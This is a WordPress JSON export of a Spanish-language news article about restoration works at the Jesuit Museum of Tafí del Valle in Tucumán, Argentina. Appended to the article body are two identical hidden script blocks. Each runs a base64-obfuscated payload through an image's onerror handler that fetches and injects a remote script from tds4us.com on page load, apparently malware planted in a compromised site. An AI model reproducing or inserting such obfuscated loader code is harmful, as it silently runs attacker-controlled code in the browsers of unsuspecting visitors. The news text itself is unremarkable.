{"id":1334,"date":"2022-08-19T20:16:37","date_gmt":"2022-08-19T23:16:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1334"},"modified":"2025-08-14T00:37:57","modified_gmt":"2025-08-14T03:37:57","slug":"iniciaron-las-obras-de-revalorizacion-integral-del-museo-jesuitico-de-tafi-del-valle","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1334","title":{"rendered":"Iniciaron las obras de revalorizaci\u00f3n integral del Museo Jesu\u00edtico de Taf\u00ed del Valle"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#0a704b\"><strong>Giobellina y el intendente Caliva dieron inicio oficialmente a los trabajos en el espacio cultural que busca posicionarse como el mejor museo del Norte Argentino.<\/strong><\/h4>\n\n\n\n<p>Tras ser anunciadas en enero pasado con la presencia de autoridades p\u00fablicas y privadas de la provincia, este martes se inauguraron las obras de revalorizaci\u00f3n del Museo Jesu\u00edtico de La Banda en Taf\u00ed del Valle, espacio que forma parte del patrimonio hist\u00f3rico y cultural de la villa tur\u00edstica.&nbsp;<\/p>\n\n\n\n<p>El acto de inicio de la puesta en valor estuvo encabezado por el titular del Ente Tucum\u00e1n Turismo (ETT),&nbsp;<strong>Sebastian Giobellina<\/strong>, junto al intendente tafinisto,&nbsp;<strong>Francisco Caliva<\/strong>. Tambi\u00e9n estuvieron presentes la directiva de la C\u00e1mara de Hoteles y Afines Destino Taf\u00ed del Valle,&nbsp;<strong>Marcela Funes Franco&nbsp;<\/strong>y representantes de la empresa constructora Osin, a cargo del proyecto. Las autoridades suscribieron el acta de replanteo de obra, que demandar\u00e1 una inversi\u00f3n de 70 millones de pesos y se solventar\u00e1 con fondos del Plan 50 Destinos, del Ministerio de Turismo y Deportes de la Naci\u00f3n (MinTur).<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"700\" data-id=\"1335\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico.jpeg\" alt=\"\" class=\"wp-image-1335\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico-300x205.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico-768x525.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico-218x150.jpeg 218w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico-696x476.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico-614x420.jpeg 614w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"1336\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-1024x682.jpeg\" alt=\"\" class=\"wp-image-1336\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-1024x682.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-1068x712.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico0.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"634\" height=\"852\" data-id=\"1337\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico1.jpeg\" alt=\"\" class=\"wp-image-1337\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico1.jpeg 634w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico1-223x300.jpeg 223w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/museojesuitico1-313x420.jpeg 313w\" sizes=\"(max-width: 634px) 100vw, 634px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cEs un d\u00eda especial porque se materializa un objetivo buscado durante a\u00f1os por el Ente de Turismo: la revalorizaci\u00f3n de este espacio cultural tan importante para la provincia\u201d, expres\u00f3 Giobellina, que destac\u00f3 el apoyo del MinTur y del Gobernador de Tucum\u00e1n,&nbsp;<strong>Osvaldo Jaldo<\/strong>, quien \u201ccomplementa el financiamiento que hoy nos permite dar comienzo a este proceso de transformaci\u00f3n en la Estancia Jesu\u00edtica\u201d.<\/p>\n\n\n\n<p>El referente de Turismo enfatiz\u00f3 que la puesta en valor del inmueble \u201cha dejado de ser una promesa y hoy es una realidad que, en su primera etapa, reportar\u00e1 beneficios para los trabajadores de Taf\u00ed del Valle y para la ciudad en materia econ\u00f3mica\u201d. Al mismo tiempo, inform\u00f3 que el plazo de obra ser\u00e1 de 12 meses y que, al concluir el trabajo, el Museo ser\u00e1 \u201cuno de los productos tur\u00edsticos m\u00e1s importantes de Tucum\u00e1n y la Regi\u00f3n Norte\u201d.&nbsp;<\/p>\n\n\n\n<p><strong>Las obras&nbsp;&nbsp;&nbsp;<\/strong><\/p>\n\n\n\n<p>La visita al Museo se torna esencial para conocer la historia de los jesuitas en la provincia, al tiempo que ayuda a entender la identidad de los tucumanos. Asimismo, su valor radica en su integraci\u00f3n al programa internacional de las Rutas Jesu\u00edticas que abarca a cinco pa\u00edses de Latinoam\u00e9rica.<\/p>\n\n\n\n<p>Las tareas de revalorizaci\u00f3n del inmueble, llevadas adelante por la empresa constructora&nbsp;<strong>Osin<\/strong>, comprenden la restauraci\u00f3n integral en los interiores y exteriores para revertir todas las patolog\u00edas actuales que presenta la construcci\u00f3n que data de principios del siglo XVIII. Cabe destacar que, durante todo el proceso de proyecci\u00f3n de la obra, desde su elaboraci\u00f3n hasta su etapa de ejecuci\u00f3n, se cuenta con el asesoramiento permanente de profesionales locales especialistas en patrimonio y restauraci\u00f3n. Por otro lado, se realizar\u00e1n trabajos de reposici\u00f3n de elementos constructivos que cuenten con las caracter\u00edsticas id\u00e9nticas a los existentes, entre los cuales se cuentan la carpinter\u00eda de madera y los pisos distintivos de ladrillos o cer\u00e1mica roja.<\/p>\n\n\n\n<p>&nbsp;\u201cEs una obra muy importante y delicada, por lo que le daremos prioridad a la gente del lugar que conoce bien los tipos de materiales a emplear y la forma de trabajarlos\u201d, subray\u00f3 el arquitecto&nbsp;<strong>Adri\u00e1n Castillo<\/strong>, de Osin. El profesional cont\u00f3 que se ha realizado \u201cuna primera selecci\u00f3n de artesanos regionales que desarrollar\u00e1n sus tareas en el lugar, y tambi\u00e9n se habl\u00f3 sobre la factibilidad de conseguir el material original, como la paja, la ca\u00f1a, el piso, los ladrillos y la piedra, entre otros\u201d. \u201cLa idea es no cerrar este espacio durante la ejecuci\u00f3n de la obra para no interrumpir la actividad tur\u00edstica, que es muy intensa\u201d, concluy\u00f3&nbsp;<\/p>\n\n\n\n<p>En lo que respecta al exterior del inmueble, el proyecto prev\u00e9 restaurar la pirca, el tratamiento de los accesos a la estancia, el estacionamiento, la caminer\u00eda y el sector de la quinta y huerta. Por otra parte, se adecuar\u00e1 los espacios a los requerimientos de accesibilidad.&nbsp;<\/p>\n\n\n\n<p>\u201cResalto el hecho de que esta obra estar\u00e1 impulsada, en un 85%, por manos tafinistas, trabajadores que tienen plena consciencia de la importancia que tiene la Estancia Jesu\u00edtica para nosotros y que saben c\u00f3mo proceder para mejorarla al tiempo que preserva su valor hist\u00f3rico\u201d, analiz\u00f3, por \u00faltimo, el intendente Caliva.&nbsp;<\/p>\n\n\n\n<p><strong>Tecnolog\u00eda de primer nivel<\/strong><\/p>\n\n\n\n<p>Las obras civiles de restauraci\u00f3n del edificio se complementan a posterior con el proyecto museogr\u00e1fico, cuyo objetivo es que los visitantes puedan descubrir la historia del valle a trav\u00e9s de todos sus sentidos. Para lograr esto, se realizar\u00e1 una reorganizaci\u00f3n total de la muestra actual, se incorporar\u00e1n contenidos audiovisuales al relato y se dise\u00f1ar\u00e1 iluminaci\u00f3n adecuada para los diferentes objetos que componen la muestra. A trav\u00e9s de su recorrido, el visitante podr\u00e1 comprender y experimentar lo que se cuenta en el museo, desde la historia de los pueblos originarios y sus diferentes culturas, la llegada de los espa\u00f1oles, el asentamiento de los Jesuitas en la provincia,el abrupto final de la Orden y su tarea y el posterior dominio de la familia Fr\u00edas Silva.&nbsp;<\/p>\n\n\n\n<p>La muestra comprende objetos que dan cuenta de cada uno de esos per\u00edodos, desde cer\u00e1micas de la cultura Taf\u00ed hasta mobiliario de la familia que utiliz\u00f3 la propiedad como vivienda. El relato del museo se completa con material gr\u00e1fico, fruto de una cuidada recopilaci\u00f3n y selecci\u00f3n documental, de fuente cient\u00edfica, producto de una larga tradici\u00f3n de investigaciones y una nutrida tradici\u00f3n oral de los habitantes del lugar. Adem\u00e1s, el sitio contar\u00e1 con muestras permanentes e itinerantes para compartir y enriquecer la experiencia de los visitantes y de los propios lugare\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.institucionalturismotuc.gob.ar\/noticias\/noticia\/457\/Iniciaron+las+obras+de+revalorizaci%C3%B3n+integral+del+Museo+Jesu%C3%ADtico+de+Taf%C3%AD+del+Valle\" target=\"_blank\" rel=\"noreferrer noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_201429_www.institucionalturismotuc.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1338\" width=\"353\" height=\"42\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Giobellina y el intendente Caliva dieron inicio oficialmente a los trabajos en el espacio cultural que busca posicionarse como el mejor museo del Norte Argentino. Tras ser anunciadas en enero pasado con la presencia de autoridades p\u00fablicas y privadas de la provincia, este martes se inauguraron las obras de revalorizaci\u00f3n del Museo Jesu\u00edtico de La [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1334","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1334"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1334"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1334\/revisions"}],"predecessor-version":[{"id":7386,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1334\/revisions\/7386"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1336"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}